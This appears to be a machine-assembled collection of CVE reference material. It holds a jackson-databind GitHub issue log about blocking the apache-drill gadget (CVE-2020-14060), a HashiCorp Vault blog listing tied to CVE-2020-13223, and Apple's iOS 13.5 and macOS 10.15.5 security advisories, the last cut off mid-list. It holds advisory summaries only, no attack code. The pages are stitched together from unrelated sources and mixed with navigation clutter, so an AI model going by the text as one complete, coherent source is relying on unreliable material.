FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill).

![@cowtowncoder](https://avatars.githubusercontent.com/u/55065?s=88&u=fdce6737a39cbda5176c8aa3bda56c2bf95190f0&v=4)

martokarski pushed a commit to atlassian/jackson-1 that referenced this issue

May 8, 2020

![@cowtowncoder](https://avatars.githubusercontent.com/u/55065?s=60&u=fdce6737a39cbda5176c8aa3bda56c2bf95190f0&v=4) cowtowncoder changed the title Block one more gadget type (-) Block one more gadget type (apache-drill)

Jun 14, 2020

![@cowtowncoder](https://avatars.githubusercontent.com/u/55065?s=60&u=fdce6737a39cbda5176c8aa3bda56c2bf95190f0&v=4) cowtowncoder changed the title Block one more gadget type (apache-drill) Block one more gadget type (apache-drill, CVE-2020-14060)

Jun 14, 2020

qxo added a commit to qxo/jackson-databind that referenced this issue

Sep 21, 2020

![@qxo](https://avatars.githubusercontent.com/u/1813709?s=60&u=bd3d8d43e572bcb00db281c479a4171eb66abba1&v=4)

![@qxo](https://avatars.githubusercontent.com/u/1813709?s=60&u=bd3d8d43e572bcb00db281c479a4171eb66abba1&v=4) qxo mentioned this issue

Sep 21, 2020

cowtowncoder pushed a commit that referenced this issue

Sep 22, 2020

![@qxo](https://avatars.githubusercontent.com/u/1813709?s=60&u=bd3d8d43e572bcb00db281c479a4171eb66abba1&v=4)

 #2670 #2680 #2682 #2688 #2698 #2704 #2765 #2798 #2814 #2826 #2827 #2854 (#2858)

1. generated diff CVE diff
git diff ad5a630 -- src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java

2. cleanup the diff ,just remain the CVE change

3. apply the diff

4. check and make sure only commit the AutoType CVE change.

\`\`\`
PR\_LIST=$(git log1 -n 17 ad5a630 -- src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java | awk -F'\[ ,\]+' '{for(i=1;i<=NF;i++){a=$(i);if(match(a,/#\[0-9\]+/)){print a;}}}' | sort | uniq);echo "$PR\_LIST" | wc -l
echo $PR\_LIST
\`\`\`

CVE-2020-14060: Block one more gadget type (apache-drill, CVE-2020-14060) · Issue #2688 · FasterXML/jackson-databind

HashiCorp Vault and Vault Enterprise logged proxy environment variables that potentially included sensitive credentials. Fixed in 1.3.6 and 1.4.2.

Blog

*   Home
*   Products & Technology
*   Company
*   HashiCorp Voices
*   All

![Vault Logo](data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjA4IiBoZWlnaHQ9Ijg4IiB2aWV3Qm94PSIwIDAgMjA4IDg4IiBmaWxsPSJub25lIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxwYXRoIGQ9Ik0xMTQuODQ5IDIzLjY5aDcuOTJMMTEwLjY5OSA2NGgtMTEuMjVsLTEyLTQwLjI4aDcuOTJsOS43NCAzMy41NyA5Ljc0LTMzLjZ6TTE0NC43NSA2NGgtNmwtLjU1LTJhMTYuMTIgMTYuMTIgMCAwMS04Ljc3IDIuNmMtNS4zOCAwLTcuNjgtMy42OS03LjY4LTguNzcgMC02IDIuNi04LjI5IDguNTktOC4yOWg3LjA4di0zLjFjMC0zLjI3LS45MS00LjQyLTUuNjMtNC40MmE0MC43MSA0MC43MSAwIDAwLTguMTYuOTFsLS45MS01LjYzYTM4LjY3OCAzOC42NzggMCAwMTEwLjEtMS4zOWM5LjI1IDAgMTIgMy4yNyAxMiAxMC42NUwxNDQuNzUgNjR6bS03LjM3LTExLjEzaC01LjQ1Yy0yLjQyIDAtMy4wOC42Ny0zLjA4IDIuOTEgMCAyIC42NiAzIDMgM2ExMS43MiAxMS43MiAwIDAwNS41Ny0xLjUxbC0uMDQtNC40em0xOC45OTItMTguMzV2MjAuNTZjMCAxLjU3LjY2IDIuMzYgMi4zNiAyLjM2IDEuNyAwIDUtMS4wOSA3LjY4LTIuNDhWMzQuNTJoNy4zOFY2NGgtNS42M2wtLjcyLTIuNDhhMjkuNDM3IDI5LjQzNyAwIDAxLTExLjggMy4wOWMtNC45IDAtNi42NS0zLjQ1LTYuNjUtOC43MVYzNC41Mmg3LjM4ek0xNzcuNzE5IDY0VjIyLjQ4bDcuMzgtMVY2NGgtNy4zOHptMjkuMzg4LS41N2EyMC42MTggMjAuNjE4IDAgMDEtNi40NyAxLjE1Yy01LjM4IDAtOC4xMS0yLjU0LTguMTEtNy44di0xNi40aC00LjQxdi01Ljg2aDQuNDFWMjcuMmw3LjM4LTF2OC4zNWg3LjU2bC0uNDggNS44NmgtNy4wOHYxNS40YTIuMzIzIDIuMzIzIDAgMDAxLjU5NiAyLjUxNGMuMzQ0LjExLjcwOC4xNCAxLjA2NC4wODVhMTMuOTE5IDEzLjkxOSAwIDAwMy42OS0uNjFsLjg1IDUuNjN6TTAgMTIuNmwzMS44NSA2My45Mkw2My45MiAxMi42SDB6bTM1LjYzIDEyLjgzaDMuNzF2My43MWgtMy43MXYtMy43MXptLTcuMzggMTQuODJoLTMuN3YtMy43aDMuN3YzLjd6bTAtNS41NmgtMy43VjMxaDMuN3YzLjY5em0wLTUuNTVoLTMuN3YtMy43MWgzLjd2My43MXptNS42IDE2LjY3aC0zLjdWNDIuMWgzLjd2My43MXptMC01LjU2aC0zLjd2LTMuN2gzLjd2My43em0wLTUuNTZoLTMuN1YzMWgzLjd2My42OXptMC01LjU1aC0zLjd2LTMuNzFoMy43djMuNzF6TTM1LjYzIDMxaDMuNzF2My43aC0zLjcxVjMxem0wIDkuMjZ2LTMuN2gzLjcxdjMuN2gtMy43MXoiIGZpbGw9IiNmZmYiLz48L3N2Zz4=)

Vault is a platform for centralized secrets management, encryption as a service, and identity-based access.

Subscribe to Vault RSS

November 17 2021 | Products & Technology

**Announcing HashiCorp Vault 1.9**

Vault 1.9 can act as an OIDC provider, includes general availability of a key management secrets engine for Google Cloud, and updates to Transform, Namespaces, and the UI.

![Announcing HashiCorp Vault 1.9](https://www.datocms-assets.com/2885/1620082983-blog-library-product-vault-dark-graphics.jpg)

![Integrating Azure AD Identity with HashiCorp Vault — Part 3: Azure Managed Identity Auth via Azure Auth Method](https://www.datocms-assets.com/2885/1608228062-blog-library-product-vault-azure.png)

February 11 2022 | Products & Technology

**Integrating Azure AD Identity with HashiCorp Vault — Part 3: Azure Managed Identity Auth via Azure Auth Method**

Learn how to achieve machine authentication to HashiCorp Vault with the Azure auth method using Microsoft Azure managed identity — and set it up with Terraform.

![HCP Vault Observability at Scale Using Datadog’s Vector](https://www.datocms-assets.com/2885/1643669249-hcpv-vector.png)

February 02 2022 | Company

**HCP Vault Observability at Scale Using Datadog’s Vector**

Get technical insight into how HCP Vault uses Datadog’s Vector integration to meet the observability needs of customers.

![Enabling Transparent Data Encryption for Microsoft SQL with Vault](https://www.datocms-assets.com/2885/1620083006-blog-library-product-vault-dark-gradient.jpg)

February 01 2022 | Products & Technology

**Enabling Transparent Data Encryption for Microsoft SQL with Vault**

Learn how HashiCorp Vault can help secure data in Microsoft SQL Server using a defense-in-depth encryption strategy.

![Kubernetes Vault Integration via Sidecar Agent Injector vs. CSI Provider](https://www.datocms-assets.com/2885/1608227983-blog-library-product-kubernetes-vault.png)

January 26 2022 | Products & Technology

**Kubernetes Vault Integration via Sidecar Agent Injector vs. CSI Provider**

A detailed comparison of two HashiCorp-supported methods for HashiCorp Vault and Kubernetes integration.

![How to Adopt a Producer-Consumer Model for HashiCorp Vault](https://www.datocms-assets.com/2885/1620083006-blog-library-product-vault-dark-gradient.jpg)

January 19 2022 | Products & Technology

**How to Adopt a Producer-Consumer Model for HashiCorp Vault**

Learn our best practices and get customer-tested templates that help HashiCorp Vault users adopt efficient producer-consumer models.

![HashiCorp’s Security and Compliance Program Takes Another Step Forward](https://www.datocms-assets.com/2885/1600142862-blog-library-product-hashicorp.png)

January 14 2022 | Products & Technology

**HashiCorp’s Security and Compliance Program Takes Another Step Forward**

HashiCorp has renewed its SOC II Type II report for HCP Vault and HCP Consul, and obtained ISO 27017 and ISO 27018 certificates for its cloud products.

CVE-2020-13223: HashiCorp Blog: Vault

A race condition was addressed with improved state handling. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. An application may be able to gain elevated privileges.

Released May 20, 2020

**Accounts**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A remote attacker may be able to cause a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2020-9827: Jannik Lorenz of SEEMOO @ TU Darmstadt

**AirDrop**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A remote attacker may be able to cause a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2020-9826: Dor Hadad of Palo Alto Networks

**AppleMobileFileIntegrity**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A malicious application could interact with system processes to access private information and perform privileged actions

Description: An entitlement parsing issue was addressed with improved parsing.

CVE-2020-9842: Linus Henze (pinauten.de)

**Audio**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9815: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative

**Audio**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-9791: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative

**Bluetooth**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic

Description: An issue existed with the use of a PRNG with low entropy. This issue was addressed with improved state management.

CVE-2020-6616: Jörn Tillmanns (@matedealer) and Jiska Classen (@naehrdine) of Secure Mobile Networking Lab

**Bluetooth**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A remote attacker may be able to cause arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9838: Dennis Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab

**CoreText**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Processing a maliciously crafted text message may lead to application denial of service

Description: A validation issue was addressed with improved input sanitization.

CVE-2020-9829: Aaron Perris (@aaronp613), an anonymous researcher, an anonymous researcher, Carlos S Tech, Sam Menzies of Sam’s Lounge, Sufiyan Gouri of Lovely Professional University, India, Suleman Hasan Rathor of Arabic-Classroom.com

**FaceTime**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A user’s video may not be paused in a FaceTime call if they exit the FaceTime app while the call is ringing

Description: An issue existed in the pausing of FaceTime video. The issue was resolved with improved logic.

CVE-2020-9835: Olivier Levesque (@olilevesque)

**File System**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A remote attacker may be able to modify the file system

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9820: Thijs Alkemade of Computest

**FontParser**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2020-9816:  Peter Nguyen Vu Hoang of STAR Labs working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-3878: Samuel Groß of Google Project Zero

**ImageIO**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2020-9789: Wenchao Li of VARAS@IIE

CVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab

**IPSec**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9837: Thijs Alkemade of Computest

**Kernel**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2020-9821: Xinru Chi and Tielei Wang of Pangu Lab

**Kernel**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A malicious application may be able to determine another application's memory layout

Description: An information disclosure issue was addressed by removing the vulnerable code.

CVE-2020-9797: an anonymous researcher

**Kernel**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An integer overflow was addressed through improved input validation.

CVE-2020-9852: Tao Huang and Tielei Wang of Pangu Lab

**Kernel**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2020-9795: Zhuo Liang of Qihoo 360 Vulcan Team

**Kernel**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: An application may be able to cause unexpected system termination or write kernel memory

Description: A memory corruption issue was addressed with improved state management.

CVE-2020-9808: Xinru Chi and Tielei Wang of Pangu Lab

**Kernel**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A local user may be able to read kernel memory

Description: An information disclosure issue was addressed with improved state management.

CVE-2020-9811: Tielei Wang of Pangu Lab

CVE-2020-9812: derrek (@derrekr6)

**Kernel**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A logic issue existed resulting in memory corruption. This was addressed with improved state management.

CVE-2020-9813: Xinru Chi of Pangu Lab

CVE-2020-9814: Xinru Chi and Tielei Wang of Pangu Lab

**Kernel**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A malicious application may be able to determine kernel memory layout

Description: An information disclosure issue was addressed with improved state management.

CVE-2020-9809: Benjamin Randazzo (@\_\_\_\_benjamin)

**libxpc**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A malicious application may be able to overwrite arbitrary files

Description: A path handling issue was addressed with improved validation.

CVE-2020-9994: Apple

Entry added September 21, 2020

**Mail**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Processing a maliciously crafted mail message may lead to heap corruption

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2020-9819: ZecOps.com

**Mail**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Processing a maliciously crafted mail message may lead to unexpected memory modification or application termination

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2020-9818: ZecOps.com

**Messages**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Users removed from an iMessage conversation may still be able to alter state

Description: This issue was addressed with improved checks.

CVE-2020-9823: Suryansh Mansharamani, student of Community Middle School, Plainsboro, New Jersey

**Notifications**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A person with physical access to an iOS device may be able to view notification contents from the lockscreen

Description: An authorization issue was addressed with improved state management.

CVE-2020-9848: Nima

**rsync**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A remote attacker may be able to overwrite existing files

Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.

CVE-2014-9512: gaojianfeng

Entry added July 28, 2020

**Sandbox**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A malicious application may be able to bypass Privacy preferences

Description: An access issue was addressed with additional sandbox restrictions.

CVE-2020-9825: Sreejith Krishnan R (@skr0x1C0)

**Security**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved validation.

CVE-2020-9854: Ilias Morad (A2nkF)

Entry added July 28, 2020

**SQLite**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A malicious application may cause a denial of service or potentially disclose memory contents

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9794

**System Preferences**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: An application may be able to gain elevated privileges

Description: A race condition was addressed with improved state handling.

CVE-2020-9839: @jinmo123, @setuid0x0\_, and @insu\_yun\_en of @SSLab\_Gatech working with Trend Micro’s Zero Day Initiative

**USB Audio**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A USB device may be able to cause a denial of service

Description: A validation issue was addressed with improved input sanitization.

CVE-2020-9792: Andy Davis of NCC Group

**WebKit**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9805: an anonymous researcher

**WebKit**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9802: Samuel Groß of Google Project Zero

**WebKit**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A remote attacker may be able to cause arbitrary code execution

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9850: @jinmo123, @setuid0x0\_, and @insu\_yun\_en of @SSLab\_Gatech working with Trend Micro’s Zero Day Initiative

**WebKit**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Processing maliciously crafted web content may lead to a cross site scripting attack

Description: An input validation issue was addressed with improved input validation.

CVE-2020-9843: Ryan Pickren (ryanpickren.com)

**WebKit**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2020-9803: Wen Xu of SSLab at Georgia Tech

**WebKit**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2020-9806: Wen Xu of SSLab at Georgia Tech

CVE-2020-9807: Wen Xu of SSLab at Georgia Tech

**WebKit**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A type confusion issue was addressed with improved memory handling.

CVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative

**WebRTC**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: Processing maliciously crafted web content may result in the disclosure of process memory

Description: An access issue was addressed with improved memory management.

CVE-2019-20503: natashenka of Google Project Zero

**Wi-Fi**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory

Description: A double free issue was addressed with improved memory management.

CVE-2020-9844: Ian Beer of Google Project Zero

**Wi-Fi**

Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2020-9830: Tielei Wang of Pangu Lab

Entry added August 10, 2020

CVE-2020-9839: About the security content of iOS 13.5 and iPadOS 13.5

A permissions issue existed. This issue was addressed with improved permission validation. This issue is fixed in macOS Catalina 10.15.5. A malicious application may be able to gain root privileges.

Released May 26, 2020

**Accounts**

Available for: macOS Catalina 10.15.4

Impact: A remote attacker may be able to cause a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2020-9827: Jannik Lorenz of SEEMOO @ TU Darmstadt

**Accounts**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9772: Allison Husain of UC Berkeley

**AirDrop**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A remote attacker may be able to cause a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2020-9826: Dor Hadad of Palo Alto Networks

**AppleMobileFileIntegrity**

Available for: macOS High Sierra 10.13.6, macOS Catalina 10.15.4

Impact: A malicious application could interact with system processes to access private information and perform privileged actions

Description: An entitlement parsing issue was addressed with improved parsing.

CVE-2020-9842: Linus Henze (pinauten.de)

**AppleUSBNetworking**

Available for: macOS Catalina 10.15.4

Impact: Inserting a USB device that sends invalid messages may cause a kernel panic

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9804: Andy Davis of NCC Group

**Audio**

Available for: macOS Catalina 10.15.4

Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9815: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative

**Audio**

Available for: macOS Catalina 10.15.4

Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-9791: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative

**Bluetooth**

Available for: macOS Catalina 10.15.4

Impact: A malicious application may be able to determine kernel memory layout

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9831: Yu Wang of Didi Research America

**Bluetooth**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6

Impact: A local user may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-9779: Yu Wang of Didi Research America

Entry added September 21, 2020

**Calendar**

Available for: macOS Catalina 10.15.4

Impact: Importing a maliciously crafted calendar invitation may exfiltrate user information

Description: This issue was addressed with improved checks.

CVE-2020-3882: Andy Grant of NCC Group

**CoreBluetooth**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6

Impact: A remote attacker may be able to leak sensitive user information

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-9828: Jianjun Dai of Qihoo 360 Alpha Lab

**CVMS**

Available for: macOS Catalina 10.15.4

Impact: An application may be able to gain elevated privileges

Description: This issue was addressed with improved checks.

CVE-2020-9856: @jinmo123, @setuid0x0\_, and @insu\_yun\_en of @SSLab\_Gatech working with Trend Micro’s Zero Day Initiative

**DiskArbitration**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to break out of its sandbox

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9847: Zhuo Liang of Qihoo 360 Vulcan Team working with 360 BugCloud (bugcloud.360.cn)

**Find My**

Available for: macOS Catalina 10.15.4

Impact: A local attacker may be able to elevate their privileges

Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.

CVE-2020-9855: Zhongcheng Li(CK01) of Topsec Alpha Team

**FontParser**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2020-9816:  Peter Nguyen Vu Hoang of STAR Labs working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: macOS Catalina 10.15.4

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-3878: Samuel Groß of Google Project Zero

**ImageIO**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2020-9789: Wenchao Li of VARAS@IIE

CVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab

**Intel Graphics Driver**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2020-9822: ABC Research s.r.o

**Intel Graphics Driver**

Available for: macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved state handling.

CVE-2020-9796: ABC Research s.r.o.

Entry added July 28, 2020

**IPSec**

Available for: macOS High Sierra 10.13.6, macOS Catalina 10.15.4

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9837: Thijs Alkemade of Computest

**Kernel**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2020-9821: Xinru Chi and Tielei Wang of Pangu Lab

**Kernel**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to determine another application's memory layout

Description: An information disclosure issue was addressed by removing the vulnerable code.

CVE-2020-9797: an anonymous researcher

**Kernel**

Available for: macOS Catalina 10.15.4

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An integer overflow was addressed with improved input validation.

CVE-2020-9852: Tao Huang and Tielei Wang of Pangu Lab

**Kernel**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2020-9795: Zhuo Liang of Qihoo 360 Vulcan Team

**Kernel**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: An application may be able to cause unexpected system termination or write kernel memory

Description: A memory corruption issue was addressed with improved state management.

CVE-2020-9808: Xinru Chi and Tielei Wang of Pangu Lab

**Kernel**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.4

Impact: A local user may be able to read kernel memory

Description: An information disclosure issue was addressed with improved state management.

CVE-2020-9811: Tielei Wang of Pangu Lab

CVE-2020-9812: derrek (@derrekr6)

**Kernel**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A logic issue existed resulting in memory corruption. This was addressed with improved state management.

CVE-2020-9813: Xinru Chi of Pangu Lab

CVE-2020-9814: Xinru Chi and Tielei Wang of Pangu Lab

**Kernel**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to determine kernel memory layout

Description: An information disclosure issue was addressed with improved state management.

CVE-2020-9809: Benjamin Randazzo (@\_\_\_\_benjamin)

**ksh**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A local user may be able to execute arbitrary shell commands

Description: An issue existed in the handling of environment variables. This issue was addressed with improved validation.

CVE-2019-14868

**libxpc**

Available for: macOS Catalina 10.15.4

Impact: A malicious application may be able to overwrite arbitrary files

Description: A path handling issue was addressed with improved validation.

CVE-2020-9994: Apple

Entry added September 21, 2020

**NSURL**

Available for: macOS Mojave 10.14.6

Impact: A malicious website may be able to exfiltrate autofilled data in Safari

Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.

CVE-2020-9857: Dlive of Tencent Security Xuanwu Lab

**PackageKit**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to gain root privileges

Description: A permissions issue existed. This issue was addressed with improved permission validation.

CVE-2020-9817: Andy Grant of NCC Group

**PackageKit**

Available for: macOS Catalina 10.15.4

Impact: A malicious application may be able to modify protected parts of the file system

Description: An access issue was addressed with improved access restrictions.

CVE-2020-9851: an anonymous researcher, Linus Henze (pinauten.de)

Entry updated July 15, 2020

**Python**

Available for: macOS Catalina 10.15.4

Impact: A remote attacker may be able to cause arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2020-9793

**rsync**

Available for: macOS Catalina 10.15.4

Impact: A remote attacker may be able to overwrite existing files

Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.

CVE-2014-9512: gaojianfeng

Entry added July 28, 2020

**Sandbox**

Available for: macOS Catalina 10.15.4

Impact: A malicious application may be able to bypass Privacy preferences

Description: An access issue was addressed with additional sandbox restrictions.

CVE-2020-9825: Sreejith Krishnan R (@skr0x1C0)

**Sandbox**

